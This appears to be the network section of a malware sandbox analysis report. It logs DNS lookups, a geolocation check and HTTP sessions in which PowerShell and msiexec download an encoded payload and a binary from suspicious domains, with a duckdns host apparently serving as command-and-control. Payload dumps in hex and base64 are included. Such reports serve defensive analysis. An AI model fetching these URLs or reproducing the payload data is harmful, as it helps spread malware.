Oct 17, 2024 15:03:34.706638098 CEST | 53 | 58062 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:39.075403929 CEST | 51453 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:40.075342894 CEST | 51453 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:41.084570885 CEST | 51453 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:43.086155891 CEST | 53 | 51453 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:43.086201906 CEST | 53 | 51453 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:43.086231947 CEST | 53 | 51453 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:44.138720989 CEST | 50409 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:44.959640980 CEST | 53 | 50409 | 1.1.1.1 | 192.168.2.5
Oct 17, 2024 15:03:46.806915045 CEST | 55004 | 53 | 192.168.2.5 | 1.1.1.1
Oct 17, 2024 15:03:46.816452026 CEST | 53 | 55004 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 17, 2024 15:03:05.839698076 CEST | 192.168.2.5 | 1.1.1.1 | 0x32fc | Standard query (0) | miottoezanella.com | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:34.451427937 CEST | 192.168.2.5 | 1.1.1.1 | 0xc74 | Standard query (0) | plieltd.top | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:39.075403929 CEST | 192.168.2.5 | 1.1.1.1 | 0x8495 | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:40.075342894 CEST | 192.168.2.5 | 1.1.1.1 | 0x8495 | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:41.084570885 CEST | 192.168.2.5 | 1.1.1.1 | 0x8495 | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:44.138720989 CEST | 192.168.2.5 | 1.1.1.1 | 0x145a | Standard query (0) | pelele.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:46.806915045 CEST | 192.168.2.5 | 1.1.1.1 | 0x74d3 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 17, 2024 15:03:05.877800941 CEST | 1.1.1.1 | 192.168.2.5 | 0x32fc | No error (0) | miottoezanella.com |  | 194.76.118.27 | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:34.706638098 CEST | 1.1.1.1 | 192.168.2.5 | 0xc74 | No error (0) | plieltd.top |  | 104.21.56.189 | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:34.706638098 CEST | 1.1.1.1 | 192.168.2.5 | 0xc74 | No error (0) | plieltd.top |  | 172.67.155.139 | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:43.086155891 CEST | 1.1.1.1 | 192.168.2.5 | 0x8495 | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:43.086201906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8495 | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:43.086231947 CEST | 1.1.1.1 | 192.168.2.5 | 0x8495 | Server failure (2) | pelele.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:44.959640980 CEST | 1.1.1.1 | 192.168.2.5 | 0x145a | No error (0) | pelele.duckdns.org |  | 185.236.203.101 | A (IP address) | IN (0x0001) | false
Oct 17, 2024 15:03:46.816452026 CEST | 1.1.1.1 | 192.168.2.5 | 0x74d3 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• miottoezanella.com
• plieltd.top
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49860 | 178.237.33.50 | 80 | 1276 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 17, 2024 15:03:46.823956013 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 17, 2024 15:03:47.683250904 CEST | 1165 | IN | HTTP/1.1 200 OK
date: Thu, 17 Oct 2024 13:03:47 GMT
server: Apache
content-length: 957
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
Data Ascii: { "geoplugin_request":"173.254.250.82", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 194.76.118.27 | 443 | 5576 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-17 13:03:08 UTC | 176 | OUT | GET /Hovedvrket.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: miottoezanella.com
Connection: Keep-Alive
2024-10-17 13:03:08 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Thu, 17 Oct 2024 13:03:04 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Thu, 17 Oct 2024 11:16:48 GMT
Accept-Ranges: bytes
Content-Length: 452820
Content-Type: application/x-rar-compressed
2024-10-17 13:03:08 UTC | 7939 | IN | Data Raw: 63 51 47 62 36 77 49 31 61 72 74 2f 2b 67 34 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6c 6a 64 56 67 37 36 77 4a 6b 68 33 45 42 6d 34 48 78 79 30 64 62 57 48 45 42 6d 2b 73 43 46 35 65 42 36 61 67 79 41 32 4e 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 73 36 61 70 35 75 73 43 66 2b 68 78 41 5a 76 72 41 67 47 39 63 51 47 62 4d 63 72 72 41 76 71 74 63 51 47 62 69 52 51 4c 36 77 4b 34 70 6e 45 42 6d 39 48 69 36 77 4b 78 75 58 45 42 6d 34 50 42 42 4f 73 43 75 50 4e 78 41 5a 75 42 2b 55 47 59 50 51 4a 38 79 33 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 71 52 41 69 63 50 72 41 72 38 66 63 51 47 62 67 63 4d 2f 51 67 59 42 36 77 4b 79 73 6e 45 42 6d 37 72 4d 64 6b 68 5a 63 51 47 62 36 77 4c 55 51 59 48 79 6d 42 44
Data Ascii: cQGb6wI1art/+g4AcQGbcQGbA1wkBHEBm3EBm7ljdVg76wJkh3EBm4Hxy0dbWHEBm+sCF5eB6agyA2NxAZtxAZtxAZtxAZu6s6ap5usCf+hxAZvrAgG9cQGbMcrrAvqtcQGbiRQL6wK4pnEBm9Hi6wKxuXEBm4PBBOsCuPNxAZuB+UGYPQJ8y3EBm3EBm4tEJARxAZvrAqRAicPrAr8fcQGbgcM/QgYB6wKysnEBm7rMdkhZcQGb6wLUQYHymBD
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 32 54 6d 67 53 6e 6a 52 56 58 72 52 5a 68 33 4b 6c 47 58 6a 37 2f 71 61 67 75 78 42 55 76 4b 4b 48 42 44 75 6d 4c 43 56 32 75 4c 50 46 55 39 34 39 46 70 56 35 4d 46 6f 59 49 42 68 62 67 35 59 2f 64 6b 4b 34 4f 4a 4c 51 58 58 61 57 48 41 44 35 32 65 2b 65 52 61 42 4d 69 48 32 78 35 71 76 41 62 58 52 4c 58 56 59 47 37 56 71 52 63 6e 52 42 72 53 5a 4b 42 59 33 54 6e 47 73 57 4d 54 34 77 72 79 62 70 77 32 76 36 35 70 32 2f 48 53 4a 74 53 63 37 37 4f 66 50 75 69 64 6e 41 62 79 33 6f 63 34 53 47 55 67 51 47 5a 38 41 56 58 7a 6a 58 56 2b 50 48 35 6f 6a 6a 6c 4f 71 71 64 53 6c 75 46 73 46 4d 78 45 47 47 4a 33 59 4f 64 6e 41 34 42 6f 4a 6d 73 5a 73 4e 5a 71 73 42 41 6d 65 78 7a 6d 43 64 36 37 68 44 5a 57 47 58 31 33 53 37 66 63 4a 6f 71 64 45 5a 37 6b 72 4e 76 42
                                                                                                      Data Ascii: 2TmgSnjRVXrRZh3KlGXj7/qaguxBUvKKHBDumLCV2uLPFU949FpV5MFoYIBhbg5Y/dkK4OJLQXXaWHAD52e+eRaBMiH2x5qvAbXRLXVYG7VqRcnRBrSZKBY3TnGsWMT4wrybpw2v65p2/HSJtSc77OfPuidnAby3oc4SGUgQGZ8AVXzjXV+PH5ojjlOqqdSluFsFMxEGGJ3YOdnA4BoJmsZsNZqsBAmexzmCd67hDZWGX13S7fcJoqdEZ7krNvB
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 61 78 71 48 34 44 72 39 6b 58 6d 48 46 5a 4f 4a 77 77 37 69 6f 4b 45 66 45 6a 77 36 6b 42 6d 66 68 49 35 66 49 6c 36 38 48 69 56 78 33 7a 6c 4c 73 68 66 6e 41 6e 45 57 41 6a 78 66 4e 6e 75 35 58 6d 67 54 36 4e 45 74 32 59 34 77 6a 35 6d 6f 77 77 54 55 6d 46 78 49 38 79 31 54 77 2b 6a 31 41 6d 77 39 4c 69 58 64 63 41 54 52 62 57 67 39 52 62 54 6e 33 66 63 6d 49 45 6f 72 76 43 51 71 32 73 2b 4e 50 77 37 39 4f 5a 63 61 38 6f 54 50 68 37 66 50 49 69 61 73 6f 49 4a 6b 6d 71 38 6f 36 47 67 5a 44 61 43 51 38 56 6a 43 66 4a 71 41 6c 4e 44 6d 72 33 75 78 79 7a 53 4b 6d 58 46 51 35 39 61 4d 37 55 6d 4f 33 6d 51 63 61 4e 6b 4d 78 30 43 69 61 66 64 55 51 32 75 54 58 55 52 71 73 46 58 43 2f 7a 77 72 57 6f 73 74 47 73 6c 32 48 66 55 53 79 6d 6b 34 68 54 61 58 50 77 33
                                                                                                      Data Ascii: axqH4Dr9kXmHFZOJww7ioKEfEjw6kBmfhI5fIl68HiVx3zlLshfnAnEWAjxfNnu5XmgT6NEt2Y4wj5mowwTUmFxI8y1Tw+j1Amw9LiXdcATRbWg9RbTn3fcmIEorvCQq2s+NPw79OZca8oTPh7fPIiasoIJkmq8o6GgZDaCQ8VjCfJqAlNDmr3uxyzSKmXFQ59aM7UmO3mQcaNkMx0CiafdUQ2uTXURqsFXC/zwrWostGsl2HfUSymk4hTaXPw3
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 49 76 6c 44 37 4f 48 6b 44 58 53 7a 39 4f 35 33 49 74 32 47 6d 6a 6c 34 42 42 4f 66 79 58 4d 41 54 48 63 4c 66 69 65 66 73 45 47 54 2f 55 4a 6c 38 33 73 49 67 75 51 71 67 52 69 2f 67 33 4e 46 6b 30 37 63 42 59 39 67 2b 37 33 58 35 43 75 4a 36 77 59 61 6e 37 73 71 37 36 4f 41 34 4a 75 5a 77 66 31 6c 54 75 42 72 7a 6f 58 45 4a 73 4f 5a 41 2f 6d 4c 4f 45 78 72 7a 6b 41 6c 33 50 2b 36 34 39 54 75 7a 4c 30 39 74 72 4b 76 38 6f 58 58 46 4a 77 58 6b 63 62 4e 36 67 77 78 51 30 2b 70 79 50 59 57 2f 2b 59 2f 78 49 6c 6e 6a 57 7a 59 49 31 49 72 71 51 42 72 7a 45 55 79 32 45 75 5a 41 6f 6e 62 48 55 4d 69 65 37 6c 4b 53 43 66 72 58 6f 76 6f 57 73 34 4b 6b 50 5a 55 4d 66 75 5a 69 61 45 4b 45 56 49 75 71 34 2f 65 75 4e 36 43 4e 6d 49 48 51 75 51 44 4b 51 35 67 4c 51 57
                                                                                                      Data Ascii: IvlD7OHkDXSz9O53It2Gmjl4BBOfyXMATHcLfiefsEGT/UJl83sIguQqgRi/g3NFk07cBY9g+73X5CuJ6wYan7sq76OA4JuZwf1lTuBrzoXEJsOZA/mLOExrzkAl3P+649TuzL09trKv8oXXFJwXkcbN6gwxQ0+pyPYW/+Y/xIlnjWzYI1IrqQBrzEUy2EuZAonbHUMie7lKSCfrXovoWs4KkPZUMfuZiaEKEVIuq4/euN6CNmIHQuQDKQ5gLQW
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 6f 73 59 75 39 5a 37 47 62 58 50 38 4d 35 69 62 5a 4b 74 43 41 71 65 6c 76 75 74 6a 6a 6d 77 4a 6e 38 34 47 78 66 34 53 4e 78 67
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABosYu9Z7GbXP8M5ibZKtCAqelvutjjmwJn84Gxf4SNxg
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 4a 63 63 49 30 4d 47 6c 4c 69 4d 6e 72 67 35 58 4e 52 6d 48 79 4d 48 45 50 73 47 6f 74 56 50 73 34 66 51 74 78 4c 4b 50 42 47 37 54 58 33 56 30 63 36 55 56 71 4c 50 65 48 76 65 38 61 66 78 76 44 50 67 4a 6e 76 68 2f 47 56 62 47 62 57 4b 74 2f 63 6c 76 4f 46 53 46 2f 34 76 68 2f 6b 7a 2b 6d 51 63 36 6e 72 30 62 63 58 4b 4c 4a 35 58 50 39 41 6f 2f 51 2f 48 39 44 6d 41 47 65 36 71 30 4f 76 48 2f 37 58 37 4e 37 58 4a 2b 41 42 6b 53 2b 6d 68 45 4d 73 5a 73 43 4f 67 6d 38 68 53 52 68 6a 45 57 61 53 46 65 72 67 58 4a 43 48 58 44 4f 52 55 72 63 6a 4b 45 33 79 31 79 48 73 34 54 50 2b 75 68 42 75 6b 49 66 52 45 67 4d 44 34 52 57 69 77 31 43 54 49 4b 6a 69 48 34 43 73 7a 74 55 6e 6f 79 75 50 39 30 57 58 65 4d 68 6c 2f 66 72 47 59 4f 56 48 58 72 46 68 7a 42 70 49 4e
                                                                                                      Data Ascii: JccI0MGlLiMnrg5XNRmHyMHEPsGotVPs4fQtxLKPBG7TX3V0c6UVqLPeHve8afxvDPgJnvh/GVbGbWKt/clvOFSF/4vh/kz+mQc6nr0bcXKLJ5XP9Ao/Q/H9DmAGe6q0OvH/7X7N7XJ+ABkS+mhEMsZsCOgm8hSRhjEWaSFergXJCHXDORUrcjKE3y1yHs4TP+uhBukIfREgMD4RWiw1CTIKjiH4CsztUnoyuP90WXeMhl/frGYOVHXrFhzBpIN
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 5a 4c 35 4d 37 31 36 4c 54 50 7a 56 53 57 65 34 30 53 41 4e 6e 73 56 64 49 61 34 49 5a 4c 5a 2f 68 67 4c 43 38 55 53 68 2f 66 70 4f 7a 44 79 69 6c 4a 6d 71 69 65 48 2f 6f 7a 41 6e 44 69 36 52 39 4d 6f 4a 70 43 53 51 2b 49 68 67 51 68 37 53 77 6d 77 4b 72 52 34 38 66 32 50 67 45 52 71 74 57 46 50 6c 6a 38 66 70 41 6b 53 53 32 75 69 64 68 63 7a 46 50 74 5a 76 32 38 2b 6a 71 41 6d 65 78 78 78 4c 74 54 69 53 56 78 6e 30 7a 41 53 65 4e 58 49 64 4e 73 35 73 43 4b 58 75 34 7a 7a 51 4b 4d 6b 34 51 39 52 72 78 7a 5a 6e 45 4f 65 5a 43 6d 2f 6a 48 41 52 72 42 6d 74 50 73 4d 6a 45 74 45 75 52 6d 72 77 59 37 6c 4d 61 55 4f 59 39 49 4a 63 45 47 4e 59 7a 57 6e 62 5a 6d 77 6e 4d 55 59 54 37 58 4c 6c 2f 75 46 76 30 48 73 64 65 77 32 30 64 33 56 6e 52 2b 54 74 71 35 58 75
                                                                                                      Data Ascii: ZL5M716LTPzVSWe40SANnsVdIa4IZLZ/hgLC8USh/fpOzDyilJmqieH/ozAnDi6R9MoJpCSQ+IhgQh7SwmwKrR48f2PgERqtWFPlj8fpAkSS2uidhczFPtZv28+jqAmexxxLtTiSVxn0zASeNXIdNs5sCKXu4zzQKMk4Q9RrxzZnEOeZCm/jHARrBmtPsMjEtEuRmrwY7lMaUOY9IJcEGNYzWnbZmwnMUYT7XLl/uFv0Hsdew20d3VnR+Ttq5Xu
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 48 6c 35 54 6c 5a 74 46 54 4f 53 65 77 50 62 2f 48 6f 59 31 48 6a 41 4d 36 76 65 34 61 66 78 4f 5a 78 77 4a 6e 76 68 2f 30 64 62 47 62 57 34 2b 57 63 67 46 6e 66 61 67 7a 6a 55 35 34 68 53 65 32 51 4b 51 6e 4f 41 59 2b 5a 62 47 62 69 36 54 6e 4a 54 4e 78 76 70 4f 44 69 62 66 4e 58 4b 45 77 62 61 4f 5a 63 68 61 44 6b 65 4d 62 59 55 67 77 62 54 6f 78 6f 58 69 4c 63 65 62 64 71 65 77 4d 35 37 72 69 7a 79 5a 50 57 59 6f 6f 62 7a 6f 37 78 42 58 7a 49 71 42 41 61 63 31 73 4a 61 7a 64 77 4e 4d 62 78 36 73 59 5a 4a 6c 51 78 32 57 31 50 35 6a 4e 2b 68 64 63 4e 4f 45 6a 71 41 66 62 45 7a 64 67 4b 34 58 78 55 69 32 4c 4d 5a 2b 45 55 4d 62 44 34 71 37 7a 61 46 4a 4c 69 31 38 78 67 2b 35 6c 32 65 49 62 71 36 4d 54 53 38 43 47 46 33 44 72 32 72 54 48 70 33 55 43 65 50
                                                                                                      Data Ascii: Hl5TlZtFTOSewPb/HoY1HjAM6ve4afxOZxwJnvh/0dbGbW4+WcgFnfagzjU54hSe2QKQnOAY+ZbGbi6TnJTNxvpODibfNXKEwbaOZchaDkeMbYUgwbToxoXiLcebdqewM57rizyZPWYoobzo7xBXzIqBAac1sJazdwNMbx6sYZJlQx2W1P5jN+hdcNOEjqAfbEzdgK4XxUi2LMZ+EUMbD4q7zaFJLi18xg+5l2eIbq6MTS8CGF3Dr2rTHp3UCeP
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 64 2f 7a 45 54 35 55 31 54 38 34 74 6a 4a 6b 79 6e 6d 76 30 4a 69 55 46 61 58 31 37 45 2f 64 4b 4a 6d 67 4a 6e 57 56 5a 46 5a 72 48 4a 75 48 4c 38 48 78 33 6d 51 36 45 79 75 79 41 61 36 46 58 44 74 6f 76 6d 51 2b 33 59 59 50 6b 61 77 4c 57 56 54 37 44 75 71 33 48 47 46 79 4d 38 58 36 52 4f 69 2b 4c 68 4b 77 69 6b 31 65 73 59 36 69 65 49 48 71 35 6e 73 5a 73 4e 34 73 69 61 41 6d 64 4f 37 6d 62 75 4e 46 49 44 5a 37 48 4a 75 47 5a 48 2b 72 72 6d 51 39 6f 49 41 33 34 61 38 42 56 49 6e 6e 58 75 67 7a 4f 39 53 4c 44 65 57 74 70 58 43 51 66 4c 65 62 4b 38 31 70 65 51 63 44 30 4a 4d 76 4c 42 6c 56 63 44 2f 62 36 4b 31 36 48 54 73 6e 58 36 33 61 55 66 66 52 45 44 70 50 55 77 66 4d 64 78 45 43 66 4a 50 75 75 74 51 63 68 79 31 6e 46 65 39 7a 56 35 2f 71 58 6e 49 2f
                                                                                                      Data Ascii: d/zET5U1T84tjJkynmv0JiUFaX17E/dKJmgJnWVZFZrHJuHL8Hx3mQ6EyuyAa6FXDtovmQ+3YYPkawLWVT7Duq3HGFyM8X6ROi+LhKwik1esY6ieIHq5nsZsN4siaAmdO7mbuNFIDZ7HJuGZH+rrmQ9oIA34a8BVInnXugzO9SLDeWtpXCQfLebK81peQcD0JMvLBlVcD/b6K16HTsnX63aUffREDpPUwfMdxECfJPuutQchy1nFe9zV5/qXnI/
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 4f 57 6b 62 6d 67 61 78 79 66 35 63 61 4d 73 35 76 48 77 38 42 69 46 69 44 56 33 51 6c 6f 6c 52 32 48 71 74 6d 73 5a 73 6c 30 65 33 4b 67 39 49 59 6d 67 4a 6e 66 46 44 6d 56 6a 41 75 71 32 61 78 6d 2b 49 76 41 56 47 44 34 68 69 61 41 6d 64 49 55 66 55 79 4e 45 74 43 6d 44 77 79 41 32 65 78 37 76 55 6e 64 70 76 66 33 66 32 7a 5a 4a 42 32 75 66 64 66 58 52 6f 79 30 38 34 4d 56 65 61 42 49 6b 76 76 53 63 32 38 62 37 47 62 41 75 5a 50 5a 41 66 66 77 70 53 50 55 57 61 59 41 6a 6b 77 71 39 46 51 6d 61 53 48 70 74 63 65 77 57 4b 73 41 63 35 68 6e 49 4b 59 71 37 64 63 41 6f 48 43 57 71 33 6d 67 61 71 54 66 4d 49 61 4d 70 2b 59 33 4c 44 69 61 52 6f 79 43 71 39 30 37 46 39 66 62 63 65 52 74 42 72 4e 59 62 61 32 66 36 69 33 6e 4d 56 6e 4b 6b 72 73 79 7a 43 72 58 32
                                                                                                      Data Ascii: OWkbmgaxyf5caMs5vHw8BiFiDV3QlolR2HqtmsZsl0e3Kg9IYmgJnfFDmVjAuq2axm+IvAVGD4hiaAmdIUfUyNEtCmDwyA2ex7vUndpvf3f2zZJB2ufdfXRoy084MVeaBIkvvSc28b7GbAuZPZAffwpSPUWaYAjkwq9FQmaSHptcewWKsAc5hnIKYq7dcAoHCWq3mgaqTfMIaMp+Y3LDiaRoyCq907F9fbceRtBrNYba2f6i3nMVnKkrsyzCrX2


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      1 | 192.168.2.5 | 49797 | 104.21.56.189 | 443 | 1276 | C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-10-17 13:03:35 UTC | 164 | OUT | GET /nwnNBPSeuTV8.bin HTTP/1.1
                                                                                                      User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: plieltd.top
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-10-17 13:03:35 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Thu, 17 Oct 2024 13:03:35 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 494656
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thu, 17 Oct 2024 11:13:06 GMT
                                                                                                      ETag: "78c40-624aa45525608"
                                                                                                      Cache-Control: max-age=14400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 2868
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ucY3IlWD6%2FyX21JU6T2sMkXSY%2FOWaHnatI4hlrOwi%2FOfG0gLc88iP0GbDfMBmOtLDbMO5M92%2Fn%2Fgo5r1lciBM%2BkneTT4qXX5Is1nZhaERD96Hif9dgBiQx1CmCDiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d407d5718446bc5-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-10-17 13:03:35 UTC562INData Raw: 57 4d 70 a7 e6 eb cc 96 2a 76 47 23 f3 20 f9 63 0d 89 4f b1 e0 3a 48 60 58 e1 aa b5 35 1d ca ac e1 16 6d f2 be 8d 26 a4 60 2d 78 33 b8 58 42 3d fd 9e fe 1f 9e 0e cc 47 67 ea 10 2d 1a 21 25 02 35 66 ca 17 e5 d4 07 5f 9c ea 9c 0b 9a 05 cf d0 3c 4e dd 25 51 77 15 ec aa 84 ba 6d 44 57 41 86 c2 2b c2 e4 37 eb aa 7d fb 64 92 ce 31 d9 48 02 46 c1 65 07 08 f5 b4 e2 75 4d c1 31 8a a8 b2 9d db 80 11 9b 36 9f 6e d4 bd b4 66 e5 f5 d7 fe cb 93 cd fc 1b 32 a7 9a ff b3 e8 48 b5 fd 44 14 54 76 8a 94 38 1e ff de 0a e0 fa b5 ef e1 50 c1 12 da d5 32 7f e2 e9 8f 50 8e 78 37 34 f6 27 a5 f4 de f0 e3 8d 9f 5a fb c5 8e 84 5e 04 7e 11 02 5b 0f c2 6c 8b e4 ca fc 3b 47 b6 e1 43 3c 3f 1a 03 38 3e 4b 1e 26 86 57 4e 80 72 32 31 eb 8c f3 88 48 5b 5b b0 d1 fe 91 46 22 97 fa 8c 72 af a2
                                                                                                      Data Ascii: WMp*vG# cO:H`X5m&`-x3XB=Gg-!%5f_<N%QwmDWA+7}d1HFeuM16nf2HDTv8P2Px74'Z^~[l;GC<?8>K&WNr21H[[F"r
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: d5 30 83 00 04 6a 31 86 00 8b aa 55 02 3d c8 0a 04 ae e2 25 27 c3 a0 7e f8 e7 41 24 7c ef ae 66 a2 75 fb 78 3f be a0 85 6f 27 9e a7 44 98 08 2f 40 5e f1 0b e2 19 8f c6 73 e4 9a d8 6f 34 b1 5d ab d6 d1 aa 3f 16 9f e9 1b 7a 13 a1 de ae 2a 83 a3 7a 1b 49 c2 1f 92 70 12 46 02 92 78 b7 72 3e 21 5c 1c df e9 fc c1 ef fd 38 03 87 5d 7f be 4b 10 85 c7 f0 65 96 50 06 1a ca f6 6e 90 bc e7 1d 79 35 83 2f 14 f9 6c 20 6d 45 77 38 f1 28 3c 8d 9a f8 d9 3c 9f ed ea 12 fd 77 02 6f 38 46 48 65 f5 02 3c 8d 66 3c f4 75 f2 83 b6 ba d8 6e a6 ae ba 3e 7a cc 4c 74 9d 0d 15 e6 b4 3b b3 06 ef fc 33 8f cf cd 20 9a a6 05 28 2f 8d eb a3 15 39 78 62 6f 4c 24 b4 6f f9 5e 26 a8 da fd bc 3d c7 c6 cf e6 10 a1 dc d7 d4 d7 03 eb 1a e9 7b 5e a3 f9 87 bb f9 a4 4a 97 eb f5 d7 b1 7a f0 08 76 9b
